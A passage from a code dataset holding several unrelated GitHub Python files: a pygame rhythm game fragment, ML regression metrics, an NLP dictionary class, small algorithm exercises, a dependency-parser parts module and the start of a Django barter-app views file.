t3:\n tile_data[0] = (h/12) * 9 + (Time - tile_data[1]) * 350 * speed * (h/900)\n pygame.draw.rect(screen, (255,255,255),(w / 2 + w / 16, tile_data[0] - h / 100, w / 16 , h / 50))\n if tile_data[0] > h - (h / 9):\n t3.remove(tile_data)\n for tile_data in t4:\n tile_data[0] = (h/12) * 9 + (Time - tile_data[1]) * 350 * speed * (h/900)\n pygame.draw.rect(screen, (255,255,255), (w / 2 + w / 8, tile_data[0] - h / 100, w / 16 , h / 50))\n if tile_data[0] > h - (h / 9):\n t4.remove(tile_data)\n \n #감속속도 ============================================================= \n keys[0] += (keyset[0] - keys[0]) / (3 * (maxframe / fps))\n keys[1] += (keyset[1] - keys[1]) / (3 * (maxframe / fps))\n keys[2] += (keyset[2] - keys[2]) / (3 * (maxframe / fps))\n keys[3] += (keyset[3] - keys[3]) / (3 * (maxframe / fps))\n \n clock.tick(maxframe) #프레임제한\n \n pygame.display.flip()\n\npygame.display.update()\n\npygame.quit()\nsys.exit()\n\n","repo_name":"rladlsrua794/rhythmGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27732354567","text":"import pandas as pd\r\nimport warnings\r\nfrom sklearn.metrics import *\r\nwarnings.filterwarnings('ignore')\r\npd.set_option('display.max_rows', 500)\r\npd.set_option('display.max_columns', 500)\r\npd.set_option('display.width', 500)\r\nfrom pylab import mpl\r\nmpl.rcParams['font.sans-serif'] = ['SimHei'] # 指定默认字体\r\nmpl.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\r\nfrom feature_proc import *\r\nfrom sklearn.metrics import *\r\n\r\ndef ks_results(x,target,model):\r\n prob_target=pd.DataFrame(target)\r\n prob_target['prob'] = model.predict_proba(x)[:, 1]\r\n cross1 = pd.crosstab(prob_target['prob'], prob_target['target'])\r\n cross1 = cross1.reset_index()\r\n if 
+{"seq_id":"27732354567","text":"import pandas as pd\r\nimport numpy as np\r\nimport warnings\r\nfrom sklearn.metrics import *\r\nwarnings.filterwarnings('ignore')\r\npd.set_option('display.max_rows', 500)\r\npd.set_option('display.max_columns', 500)\r\npd.set_option('display.width', 500)\r\nfrom pylab import mpl\r\nmpl.rcParams['font.sans-serif'] = ['SimHei']  # set the default font\r\nmpl.rcParams['axes.unicode_minus'] = False  # keep the minus sign from rendering as a box in saved figures\r\nfrom feature_proc import *\r\nfrom sklearn.metrics import *\r\n\r\ndef ks_results(x,target,model):\r\n    prob_target=pd.DataFrame(target)\r\n    prob_target['prob'] = model.predict_proba(x)[:, 1]\r\n    cross1 = pd.crosstab(prob_target['prob'], prob_target['target'])\r\n    cross1 = cross1.reset_index()\r\n    if 0 not in cross1.columns:\r\n        cross1[0] = 0\r\n    if 1 not in cross1.columns:\r\n        cross1[1] = 0\r\n    cross1['y_cum_r'] = cross1[1].cumsum() / cross1[1].sum()\r\n    cross1['n_cum_r'] = cross1[0].cumsum() / cross1[0].sum()\r\n    cross1['ks'] = cross1['n_cum_r'] - cross1['y_cum_r']\r\n    KS = cross1['ks'].abs().max()\r\n    return KS\r\n\r\ndef auc_results(x, target, model):\r\n    prob = model.predict_proba(x)[:, 1]\r\n    auc = roc_auc_score(target, prob)\r\n    return auc\r\n\r\ndef regress_results(data, target, model):\r\n    predict = model.predict(data)\r\n    # mean absolute error (MAE)\r\n    mae = mean_absolute_error(target, predict)\r\n    # coefficient of determination (R-Square)\r\n    r2 = r2_score(target, predict)\r\n    # adjusted R-Square\r\n    r2_adj = 1 - (1 - r2) * (len(data) - 1) / (len(data) - data.shape[1] - 1)\r\n    # mean squared error (MSE)\r\n    mse = mean_squared_error(target, predict)\r\n\r\n    # # RMSLE (Root Mean Squared Logarithmic Error)\r\n    # train_rmse=mean_squared_log_error(train_target,train_predict)\r\n    # test_rmse=mean_squared_log_error(test_target,test_predict)\r\n    # mean absolute deviation (MAD)\r\n    def MAD(target, predictions):\r\n        absolute_deviation = np.abs(target - predictions)\r\n        return np.mean(absolute_deviation)\r\n\r\n    msd = MAD(target, predict)\r\n\r\n    # mean absolute percentage error (MAPE)\r\n    def mape(y_true, y_pred):\r\n        return np.mean(np.abs((y_pred - y_true) / (y_true + 10 ** (-5)))) * 100\r\n\r\n    mape = mape(target, predict)\r\n\r\n    # symmetric mean absolute percentage error (SMAPE)\r\n    def smape(y_true, y_pred):\r\n        return 2.0 * np.mean(np.abs(y_pred - y_true) / (np.abs(y_pred) + np.abs(y_true))) * 100\r\n\r\n    smape = smape(target, predict)\r\n    # explained variance\r\n    evs = explained_variance_score(target, predict)\r\n\r\n    # standardized residuals\r\n    def std_e(y_true, y_pred, train_data):\r\n        e = y_true - y_pred\r\n        sse = np.sum(np.square(e))\r\n        se = sse / (len(y_true) - len(train_data) - 1)\r\n        try:\r\n            d = e / se\r\n        except:\r\n            d = 0\r\n        return d\r\n\r\n    e = std_e(target, predict, data)\r\n    e_df = pd.DataFrame(e).reset_index()\r\n    e_df.columns = ['x_col', 'e']\r\n\r\n    name_lst = ['R-Square',\r\n                'Adjusted R-Square',\r\n                'explained_variance_score',\r\n                'mean_absolute_error',\r\n                # 'RMSLE (Root Mean Squared Logarithmic Error)',\r\n                'mean absolute deviation',\r\n                'Mean Absolute Percentage Error',\r\n                'Symmetric Mean Absolute Percentage Error',\r\n                'Mean Squared Error']\r\n\r\n    bz_lst = ['拟合优度',\r\n              '校正决定系数',\r\n              '解释方差',\r\n              '平均绝对值误差',\r\n              # '均方根对数误差',\r\n              '平均绝对误差',\r\n              '平均绝对百分比误差',\r\n              '对称平均绝对百分比误差',\r\n              '均方误差']\r\n\r\n    vl = [r2, r2_adj, evs, mae, msd, mape, smape, mse]\r\n\r\n    train_dct = dict(zip(name_lst, vl))\r\n\r\n    model_test = pd.DataFrame(train_dct, index=[0]).T.reset_index()\r\n    model_test.columns = ['评估指标', '评估指标值']\r\n    model_test['备注'] = bz_lst\r\n\r\n    predict = pd.DataFrame(predict, index=range(len(predict)))\r\n    target.index = range(len(target))\r\n    results = pd.concat([target, predict], axis=1)\r\n    results.columns = ['real', 'predict']\r\n\r\n    return model_test, results,e_df\r\n\r\n
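`ks_results` above computes the Kolmogorov–Smirnov separation as the largest gap between the cumulative shares of negatives and positives along the score axis. The same statistic, spelled out on synthetic scores with plain numpy (the data and numbers here are made up purely for illustration):

```python
import numpy as np

rng = np.random.default_rng(0)
# synthetic scores: negatives centered at 0.3, positives at 0.6
scores = np.concatenate([rng.normal(0.3, 0.1, 500), rng.normal(0.6, 0.1, 500)])
labels = np.concatenate([np.zeros(500), np.ones(500)])

order = np.argsort(scores)                            # sweep thresholds from low to high score
labels = labels[order]
cum_pos = np.cumsum(labels) / labels.sum()            # share of positives below each threshold
cum_neg = np.cumsum(1 - labels) / (1 - labels).sum()  # share of negatives below each threshold
print("KS =", np.abs(cum_neg - cum_pos).max())
```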
def f_regress_results(rf_model,data_sets):\r\n    train_results,train_predict_df,train_e_df=regress_results(data_sets['train_x'],data_sets['train_y'],rf_model)\r\n    test_results,test_predict_df,test_e_df=regress_results(data_sets['test_x'],data_sets['test_y'],rf_model)\r\n    future_results,future_predict_df,future_e_df=regress_results(data_sets['data_future'],data_sets['target_future'],rf_model)\r\n\r\n    results=pd.merge(pd.merge(train_results,test_results,on=['评估指标','备注']),future_results,on=['评估指标','备注'])\r\n    results.columns=['评估指标','评估指标值-训练集','备注','评估指标值-验证集','评估指标值-测试集']\r\n    results=results[['评估指标','评估指标值-训练集','评估指标值-验证集','评估指标值-测试集','备注']]\r\n\r\n    return results\r\n\r\ndef f_features_ana(data,target,vars_name,flag,model=None):\r\n    vars=data.drop([target],axis=1).columns.tolist()\r\n    vn_dct=dict(zip(vars,vars_name))\r\n    if flag=='model':\r\n        model.fit(data.drop([target],axis=1), data[target])\r\n        imp=model.feature_importances_\r\n        vars_imp=pd.DataFrame(dict(zip(vars,imp)),index=[0]).T.reset_index()\r\n        vars_imp.columns=['变量名','特征重要性']\r\n        vars_imp.变量名=vars_imp.变量名.replace(vn_dct)\r\n    elif flag=='mr':\r\n        mr_inf=dict()\r\n        for v in vars:  # score each feature column (not the target itself) against the target\r\n            mr_tmp=mutual_info_score(data[v],data[target])\r\n            mr_inf[v]=mr_tmp\r\n        vars_imp=pd.DataFrame(mr_inf,index=[0]).T.reset_index()\r\n        vars_imp.columns=['变量名','特征重要性']\r\n        vars_imp.变量名=vars_imp.变量名.replace(vn_dct)\r\n        vars_imp=vars_imp.sort_values('特征重要性',ascending=False)\r\n\r\n    return vars_imp\r\n","repo_name":"wzg-zhuo/automl","sub_path":"automl/model_results.py","file_name":"model_results.py","file_ext":"py","file_size_in_byte":6185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
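For reference, the adjusted R² used in `regress_results` above penalizes R² for the number of features; worked through once on toy numbers (the values are invented, only the formula comes from the code):

```python
# r2_adj = 1 - (1 - r2) * (n - 1) / (n - p - 1), with n samples and p features.
n, p, r2 = 100, 10, 0.80
r2_adj = 1 - (1 - r2) * (n - 1) / (n - p - 1)
print(round(r2_adj, 4))  # 0.7775 -- slightly below the raw 0.80, as expected
```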
+{"seq_id":"40398128069","text":"# -*- coding: utf-8 -*-\n\n\nimport itertools\nfrom collections import Counter\nfrom typing import *\n\nfrom multiprocessing import Pool\n\nimport torch\n\nfrom ncc.data import constants\nfrom ncc.data.constants import INF\nfrom ncc.data.dictionary import Dictionary\n\n\nclass XFGDicionary(Dictionary):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n    def encode_line(\n        self,\n        line,\n        line_tokenizer,\n        add_if_not_exist=True,\n        consumer=None,\n        append_eos=True,\n        reverse_order=False,\n        **kwargs\n    ):\n        words = line_tokenizer(line, vocab=self, **kwargs) if line_tokenizer is not None else line\n        if reverse_order:\n            words = list(reversed(words))\n        nwords = len(words)\n        ids = torch.IntTensor(nwords + 1 if append_eos else nwords)\n\n        for i, word in enumerate(words):\n            if add_if_not_exist:\n                idx = self.add_symbol(word)\n            else:\n                idx = self.index(word)\n            # assert idx != self.unk_index, (line, word)\n            if consumer is not None:\n                consumer(word, idx)\n            ids[i] = idx\n        if append_eos:\n            ids[nwords] = self.eos_index\n        return ids\n\n    @staticmethod\n    def _add_xfg_to_dictionary(\n        self,\n        line,\n        line_tokenizer,\n        add_if_not_exist=True,\n        consumer=None,\n        append_eos=True,\n        reverse_order=False,\n        **kwargs,\n    ):\n        words = line_tokenizer(line, **kwargs) if line_tokenizer is not None else line\n        if reverse_order:\n            words = list(reversed(words))\n        ids = []\n        for word in words:\n            if add_if_not_exist:\n                idx = self.add_symbol(word)\n            else:\n                idx = self.index(word)\n            if consumer is not None:\n                consumer(word, idx)\n            ids.append(idx)\n        # a tokenizer may yield a list of sub-token ids per word; flatten before building the tensor\n        if len(ids) > 0 and isinstance(ids[0], list):\n            ids = list(itertools.chain(*ids))\n        ids = torch.IntTensor(ids)\n        return ids\n\n    @staticmethod\n    def add_xfg_to_dictionary(filename: str, dict, tokenize: Any, eos_word: Optional[str], num_workers: int):\n        def merge_result(counter: Counter):\n            for w, c in sorted(counter.items()):\n                dict.add_symbol(w, c)\n\n        if num_workers > 1:\n            pool = Pool(processes=num_workers)\n            results = []\n            for worker_id in range(num_workers):\n                results.append(\n                    pool.apply_async(\n                        XFGDicionary._add_file_to_dictionary_single_worker,\n                        (filename, tokenize, eos_word, worker_id, num_workers),\n                    )\n                )\n            pool.close()\n            pool.join()\n            for r in results:\n                merge_result(r.get())\n        else:\n            merge_result(\n                XFGDicionary._add_file_to_dictionary_single_worker(\n                    filename, tokenize, eos_word\n                )\n            )\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc/data/mapping/xfg_dictionary.py","file_name":"xfg_dictionary.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"28449503151","text":"n = int(input())\n# dp[i]: the maximum amount of wine that can be drunk using glasses up to index i\ndp = [0]*n\ngrape = []\nfor _ in range(n):\n    grape.append(int(input()))\ndp[0] = grape[0]\nif n > 1:\n    dp[1] = grape[0]+grape[1]\n    if n > 2:\n        dp[2] = max(grape[0]+grape[1],grape[0]+grape[2],grape[1]+grape[2])\nfor i in range(3,n):\n    dp[i] = max(dp[i-3]+grape[i-1]+grape[i], dp[i-2]+grape[i], dp[i-1])\nprint(max(dp))\n","repo_name":"imsoncod/Python-Algorithm","sub_path":"BAKEJOON/다이나믹 프로그래밍/포도주 시식.py","file_name":"포도주 시식.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6222084299","text":"class Solution:\n    # @return a tuple, (index1, index2)\n    def twoSum(self, num, target):\n        mapper = {}\n        n = len(num)\n        for i in range(n):\n            mapper[num[i]] = i\n        for i in range(n):\n            if target - num[i] in mapper and mapper[target - num[i]] != i:\n                return (i + 1, mapper[target - num[i]] + 1)\n        return (-1, -1)","repo_name":"Shuaiyicao/leetcode-python","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1770204200","text":"import math\nimport numpy as np\n\n# Euler's method for y' = f(y): y_{n+1} = y_n + h * f(y_n), here with the logistic f(y) = 0.8*y*(1 - y)\n\nh = 0.1  # step size\nx_val_wanted = 1\niterations = int(x_val_wanted / h)\n\nx0 = 0.36\n\nyn = x0\nf_prime = 0.18432\n\nvals = [0 for i in range((iterations+1))]\n\nvals[0] = x0\nfor i in range(iterations):\n\tvals[i + 1] = vals[i] + ((0.8 * (vals[i])) * (1 - vals[i]) * (h))\n\tprint(vals[i+1])\n","repo_name":"anaconda121/School","sub_path":"Math/431/euler_method_550.py","file_name":"euler_method_550.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23838797422","text":"from collections import OrderedDict\nimport numpy as np\nfrom .dependency_instance_numeric import DependencyInstanceNumeric\nfrom .constants import Target\n\n\nclass DependencyPart(object):\n    \"\"\"\n    Base class for Dependency Parts\n    \"\"\"\n    __slots__ = 'head', 'modifier'\n\n    def __init__(self):\n        raise NotImplementedError('Abstract class')\n\n    def __str__(self):\n        nodes = [('h', self.head), ('m', self.modifier)]\n        if hasattr(self, 'grandparent'):\n            nodes.append(('g', self.grandparent))\n        if hasattr(self, 'sibling'):\n            nodes.append(('s', self.sibling))\n        if hasattr(self, 'label'):\n            nodes.append(('l', self.label))\n\n        nodes_strings = ['{}={}'.format(node[0], node[1]) for node in nodes]\n        str_ = self.__class__.__name__ + '(' + ', '.join(nodes_strings) + ')'\n        return str_\n\n\nclass Arc(DependencyPart):\n    def __init__(self, head=-1, modifier=-1):\n        self.head = head\n        self.modifier = modifier\n\n\nclass LabeledArc(DependencyPart):\n    __slots__ = 'label',\n\n    def __init__(self, head=-1, modifier=-1, label=-1):\n        self.head = head\n        self.modifier = modifier\n        self.label = label\n\n\nclass Grandparent(DependencyPart):\n    __slots__ = 
'grandparent',\n\n def __init__(self, head=-1, modifier=-1, grandparent=-1):\n self.head = head\n self.modifier = modifier\n self.grandparent = grandparent\n\n\nclass NextSibling(DependencyPart):\n __slots__ = 'sibling'\n\n def __init__(self, head=-1, modifier=-1, sibling=-1):\n self.head = head\n self.modifier = modifier\n self.sibling = sibling\n\n\nclass GrandSibling(DependencyPart):\n __slots__ = 'grandparent', 'sibling'\n\n def __init__(self, head=-1, modifier=-1, grandparent=-1, sibling=-1):\n self.head = head\n self.modifier = modifier\n self.sibling = sibling\n self.grandparent = grandparent\n\n\nclass DependencyParts(object):\n def __init__(self, instance, model_type, mask=None, num_relations=None):\n \"\"\"\n A DependencyParts object stores all the parts into which a dependency\n tree is factored.\n\n This class has an attribute arc_mask to indicate which arcs are\n considered possible. In principle, all labels are considered possible\n for possible arcs.\n\n For higher order parts, it stores OrderedDict's that map the class\n (i.e., a class object, not an instance) to DependencyPart objects such\n as Grandparent, NextSibling, etc.\n\n :param instance: a DependencyInstanceNumeric object\n :param model_type: a ModelType object, indicating which type of parts\n should be created (siblings, grandparents, etc)\n :param mask: either None (no prune) or a bool numpy matrix with shape\n (n, n) -- n is number of words with root. Cell (h, m) indicates\n if the arc from h to m is considered, if True, or pruned out, if\n False.\n :param num_relations: number of dependency relations, if used\n \"\"\"\n self.index = None\n self.index_labeled = None\n self.num_parts = 0\n\n # the mask is to be interpreted as (head, modifier)\n self.arc_mask = mask\n self.num_relations = num_relations\n\n # offsets indicate the position in which the scores of a given target\n # should start in the array with all part scores\n self.offsets = {}\n\n # store the order in which part types are used\n self.type_order = []\n\n # part_lists[Type] contains the list of Type parts\n self.part_lists = OrderedDict()\n\n self.make_parts(instance, model_type)\n\n self.best_labels = {}\n\n def save_best_labels(self, best_labels, arcs):\n \"\"\"\n Save the best labels for each arc in a dictionary.\n\n :param best_labels: array with the best label for each arc\n :param arcs: list of tuples (h, m)\n \"\"\"\n self.best_labels = dict(zip(arcs, best_labels))\n\n def concatenate_part_scores(self, scores):\n \"\"\"\n Concatenate all the vectors of part scores in the given dictionary to a\n single vector in the same order used in parts.\n\n :param scores: dictionary mapping target names to arrays\n :return: a single numpy array\n \"\"\"\n score_list = [scores[type_] for type_ in self.type_order]\n return np.concatenate(score_list)\n\n def get_labels(self, heads):\n \"\"\"\n Return the labels associated with the given head attachments for the\n words.\n\n :param heads: list or array with the head of each word in the sentence\n (root not included)\n :return: a list of predicted labels\n \"\"\"\n pred_labels = []\n for m, h in enumerate(heads, 1):\n label = self.best_labels[(h, m)]\n pred_labels.append(label)\n\n return pred_labels\n\n def add_dummy_relation(self, head, modifier):\n \"\"\"\n Add a dummy relation for the arc (head, modifier) in case it didn't \n exist. 
This can be necessary when the single root constraint forces the\n        parser to reassign some head.\n        \"\"\"\n        if (head, modifier) in self.best_labels:\n            return\n\n        self.best_labels[(head, modifier)] = 0\n\n    def make_parts(self, instance, model_type):\n        \"\"\"\n        Create all the parts to represent the instance\n        \"\"\"\n        # if no mask was given, create an all-True mask with a False diagonal\n        # and False in the first column (root as modifier)\n        if self.arc_mask is None:\n            length = len(instance)\n            self.arc_mask = np.ones([length, length], dtype=bool)\n            self.arc_mask[np.arange(length), np.arange(length)] = False\n            self.arc_mask[:, 0] = False\n\n        # TODO: enforce connectedness (necessary if pruning by tag or distance)\n\n        # if there are gold labels, store them\n        self.gold_parts = self._make_gold_arcs(instance)\n        self.type_order.append(Target.HEADS)\n        self.offsets[Target.HEADS] = 0\n\n        # all non-masked arcs count as a part\n        self.num_arcs = self.arc_mask.sum()\n\n        # labeled arcs are represented in the same order as arcs,\n        # with each arc (i, j) repeated k times, for each of k labels\n        self.num_labeled_arcs = self.num_arcs * self.num_relations\n        self.type_order.append(Target.RELATIONS)\n        self.offsets[Target.RELATIONS] = self.num_arcs\n\n        offset = self.num_arcs + self.num_labeled_arcs\n\n        if model_type.consecutive_siblings:\n            self.make_consecutive_siblings(instance)\n            self.offsets[Target.NEXT_SIBLINGS] = offset\n            offset += len(self.part_lists[Target.NEXT_SIBLINGS])\n\n        if model_type.grandparents:\n            self.make_grandparents(instance)\n            self.offsets[Target.GRANDPARENTS] = offset\n            offset += len(self.part_lists[Target.GRANDPARENTS])\n\n        if model_type.grandsiblings:\n            self.make_grandsiblings(instance)\n            self.offsets[Target.GRANDSIBLINGS] = offset\n            offset += len(self.part_lists[Target.GRANDSIBLINGS])\n\n        self.num_parts = self.num_arcs + self.num_labeled_arcs + \\\n            sum(len(parts) for parts in self.part_lists.values())\n        for type_ in self.part_lists:\n            self.type_order.append(type_)\n\n        if self.make_gold:\n            self.gold_parts = np.array(self.gold_parts, dtype=np.float32)\n            assert self.num_parts == len(self.gold_parts)\n\n    def _make_gold_arcs(self, instance: DependencyInstanceNumeric):\n        \"\"\"\n        If the instance has gold heads, create a list with the gold arcs and\n        gold relations.\n\n        :return: a list of 0s and 1s, or None if the instance has no gold heads\n        \"\"\"\n        heads = instance.get_all_heads()\n        if heads[1] == -1:\n            # check if the first non-root token has a head\n            self.make_gold = False\n            return\n\n        self.make_gold = True\n        relations = instance.get_all_relations()\n        gold_parts = []\n        gold_relations = []\n        length = len(instance)\n\n        for h in range(length):\n            for m in range(1, length):\n                if not self.arc_mask[h, m]:\n                    continue\n\n                gold_head = heads[m] == h\n                if gold_head:\n                    gold_parts.append(1)\n                else:\n                    gold_parts.append(0)\n\n                for rel in range(self.num_relations):\n                    if gold_head and relations[m] == rel:\n                        gold_relations.append(1)\n                    else:\n                        gold_relations.append(0)\n        gold_parts.extend(gold_relations)\n        return gold_parts\n\n    def make_grandparents(self, instance):\n        \"\"\"\n        Create the parts relative to grandparents.\n\n        Each part means that an arc h -> m and g -> h exist at the same time.\n\n        :type instance: DependencyInstanceNumeric\n        \"\"\"\n        gp_parts = []\n        for g in range(len(instance)):\n            for h in range(1, len(instance)):\n                if g == h:\n                    continue\n\n                if not self.arc_mask[g, h]:\n                    # the arc g -> h has been pruned out\n                    continue\n\n                gold_gh = instance.get_head(h) == g\n\n                for m in range(1, len(instance)):\n                    if h == m:\n                        # g == m is necessary to run 
the grandparent factor\n continue\n\n if not self.arc_mask[h, m]:\n # pruned out\n continue\n\n part = Grandparent(h, m, g)\n if self.make_gold:\n if gold_gh and instance.get_head(m) == h:\n gold = 1\n else:\n gold = 0\n self.gold_parts.append(gold)\n\n gp_parts.append(part)\n\n self.part_lists[Target.GRANDPARENTS] = gp_parts\n\n def make_consecutive_siblings(self, instance):\n \"\"\"\n Create the parts relative to consecutive siblings.\n\n Each part means that an arc h -> m and h -> s exist at the same time,\n with both h > m and h > s or both h < m and h < s.\n\n :param instance: DependencyInstance\n :type instance: DependencyInstanceNumeric\n \"\"\"\n parts = []\n for h in range(len(instance)):\n\n # siblings to the right of h\n # when m = h, it signals that s is the first child\n for m in range(h, len(instance)):\n\n if h != m and not self.arc_mask[h, m]:\n # pruned out\n continue\n\n gold_hm = m == h or instance.get_head(m) == h\n arc_between = False\n\n # when s = length, it signals that m encodes the last child\n for s in range(m + 1, len(instance) + 1):\n if s < len(instance) and not self.arc_mask[h, s]:\n # pruned out\n continue\n\n if self.make_gold:\n gold_hs = s == len(instance) or \\\n instance.get_head(s) == h\n\n if gold_hm and gold_hs and not arc_between:\n gold = 1\n arc_between = True\n else:\n gold = 0\n\n self.gold_parts.append(gold)\n part = NextSibling(h, m, s)\n parts.append(part)\n\n # siblings to the left of h\n for m in range(h, -1, -1):\n if h != m and not self.arc_mask[h, m]:\n # pruned out\n continue\n\n gold_hm = m == h or instance.get_head(m) == h\n arc_between = False\n\n # when s = 0, it signals that m encoded the leftmost child\n for s in range(m - 1, -2, -1):\n if s != -1 and not self.arc_mask[h, s]:\n # pruned out\n continue\n\n if self.make_gold:\n gold_hs = s == -1 or instance.get_head(s) == h\n\n if gold_hm and gold_hs and not arc_between:\n gold = 1\n arc_between = True\n else:\n gold = 0\n\n self.gold_parts.append(gold)\n part = NextSibling(h, m, s)\n parts.append(part)\n\n self.part_lists[Target.NEXT_SIBLINGS] = parts\n\n def make_grandsiblings(self, instance):\n \"\"\"\n Create the parts relative to grandsibling nodes.\n\n Each part means that arcs g -> h, h -> m, and h ->s exist at the same\n time.\n :type instance: DependencyInstanceNumeric\n \"\"\"\n parts = []\n for g in range(len(instance)):\n for h in range(1, len(instance)):\n if g == h:\n continue\n\n if not self.arc_mask[g, h]:\n # pruned\n continue\n\n gold_gh = instance.get_head(h) == g\n\n # check modifiers to the right\n for m in range(h, len(instance)):\n if h != m and not self.arc_mask[h, m]:\n # pruned; h == m signals first child\n continue\n\n gold_hm = m == h or instance.get_head(m) == h\n arc_between = False\n\n for s in range(m + 1, len(instance) + 1):\n if s < len(instance) and not self.arc_mask[h, s]:\n # pruned; s == len signals last child\n continue\n\n gold_hs = s == len(instance) or \\\n instance.get_head(s) == h\n\n if self.make_gold:\n gold = 0\n if gold_hm and gold_hs and not arc_between:\n if gold_gh:\n gold = 1\n\n arc_between = True\n self.gold_parts.append(gold)\n\n part = GrandSibling(h, m, g, s)\n parts.append(part)\n\n # check modifiers to the left\n for m in range(h, 0, -1):\n if h != m and not self.arc_mask[h, m]:\n # pruned; h == m signals last child\n continue\n\n gold_hm = m == h or instance.get_head(m) == h\n arc_between = False\n\n for s in range(m - 1, -2, -1):\n if s != -1 and not self.arc_mask[h, s]:\n # pruned out\n # s = -1 signals leftmost child\n 
continue\n\n                        gold_hs = s == -1 or instance.get_head(s) == h\n                        if self.make_gold:\n                            gold = 0\n                            if gold_hm and gold_hs and not arc_between:\n                                if gold_gh:\n                                    gold = 1\n\n                                arc_between = True\n                            self.gold_parts.append(gold)\n\n                        part = GrandSibling(h, m, g, s)\n                        parts.append(part)\n\n        self.part_lists[Target.GRANDSIBLINGS] = parts\n\n    def get_margin(self):\n        \"\"\"\n        Compute and return a margin vector to be used in the loss and a\n        normalization term to be added to it.\n\n        It only affects Arcs or LabeledArcs (in case the latter are used).\n\n        :return: a margin array to be added to the model scores and a\n            normalization constant. The vector is as long as the number of\n            parts.\n        \"\"\"\n        # TODO: avoid repeated code with dependency_decoder\n        p = np.zeros(len(self), dtype=float)\n\n        # place the margin on LabeledArcs scores\n        # their offset in the gold vector is immediately after Arcs\n        offset = self.offsets[Target.RELATIONS]\n        num_parts = self.num_labeled_arcs\n\n        gold_values = self.gold_parts[offset:offset + num_parts]\n        p[offset:offset + num_parts] = 0.5 - gold_values\n        q = 0.5 * gold_values.sum()\n\n        return p, q\n\n    def create_arc_index(self):\n        \"\"\"\n        Create a matrix such that cell (h, m) has the position of the given arc\n        in the arc list, or -1 if it doesn't exist.\n\n        The matrix shape is (n, n), where n includes the dummy root.\n        \"\"\"\n        mask = self.arc_mask.astype(int)\n\n        # replace 1's and 0's with their positions\n        mask[mask == 0] = -1\n        mask[mask == 1] = np.arange(np.sum(mask == 1))\n\n        return mask\n\n    def get_arc_indices(self):\n        \"\"\"\n        Return a tuple with indices for heads and modifiers of valid arcs, such\n        that they are ordered first by head and then by modifier.\n\n        Modifier words are numbered from 1; 0 is reserved for the root.\n\n        This ensures that all conversions from arc_mask to arcs will have the\n        same ordering.\n\n        :return: a tuple (heads, modifiers)\n        \"\"\"\n        head_indices, modifier_indices = np.where(self.arc_mask)\n\n        return head_indices, modifier_indices\n\n    def has_type(self, type_):\n        \"\"\"\n        Return whether this object stores parts of a particular type.\n\n        :param type_: a class such as NextSibling or\n            Grandparent\n        :return: boolean\n        \"\"\"\n        return type_ in self.part_lists and len(self.part_lists[type_]) > 0\n\n    def __len__(self):\n        return self.num_parts\n\n    def get_num_type(self, type_):\n        \"\"\"\n        Return the number of parts of the given type\n        \"\"\"\n        if type_ not in self.part_lists:\n            return 0\n        return len(self.part_lists[type_])\n\n    def get_type_offset(self, type_):\n        \"\"\"\n        Return the offset of the given type in the ordered array with gold data.\n        \"\"\"\n        if type_ == Target.HEADS:\n            return 0\n\n        if type_ == Target.RELATIONS:\n            return self.num_arcs\n\n        if type_ not in self.part_lists:\n            return -1\n\n        offset = self.num_arcs + self.num_labeled_arcs\n        for type_i in self.part_lists:\n            if type_i == type_:\n                return offset\n            else:\n                offset += len(self.part_lists[type_i])\n\n    def get_gold_output(self):\n        \"\"\"\n        Return a single list with all gold values, in the order that parts were\n        added.\n\n        If first Arc parts were added, then some Sibling, then more Arcs, the\n        gold list will have all Arcs and then all Siblings.\n\n        :return: a list if any output exists, None otherwise\n        \"\"\"\n        all_gold = []\n        if self.make_gold:\n            # gold_parts already concatenates every part type in order\n            all_gold = list(self.gold_parts)\n\n        if len(all_gold) == 0:\n            return None\n\n        return 
all_gold\n","repo_name":"deep-spin/pyturbo","sub_path":"turboparser/parser/dependency_parts.py","file_name":"dependency_parts.py","file_ext":"py","file_size_in_byte":19221,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"40724376690","text":"import json\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.db.models import Avg\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import User, Category, Service, Purchase, Rating, Comment, Reply\n\n\n\n\"\"\" renders the index if the user is not logged in, or the 'explore' page if he is \"\"\"\ndef index(request):\n\n # If the user is logged in, redirect to the \"explore\" page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"explore\"))\n\n # Else, show the index page\n else:\n return render(request, \"barter/index.html\")\n \n\n\n\"\"\" renders the page \"explore\" of the app \"\"\"\n@login_required\ndef explore(request):\n\n # get all the active services from the db\n services = Service.objects.filter(status=True).order_by('name')\n\n # get the catogories for the filter option\n categories = Category.objects.all().order_by('category')\n\n # get the info of the user\n userinfo = User.objects.get(username=request.user)\n\n # get the info of the user's purchases\n purchases = Purchase.objects.filter(user_id=userinfo)\n\n # create a list of the IDs of the services purchased by the user to be able to render the buy/bought button correctly\n purchases_list = []\n for purchase in purchases:\n purchases_list.append(purchase.service_id.id)\n\n # get the user's services (for the left column)\n user_services = Service.objects.filter(user_id=userinfo, status=True).count()\n\n # get the watchlist of the user\n watchlist = userinfo.watchedby.all().order_by('name')\n\n\n # render the template\n return render(request, \"barter/explore.html\", {\n \"services\": services,\n \"categories\": categories,\n \"userinfo\": userinfo,\n \"purchases\": purchases,\n 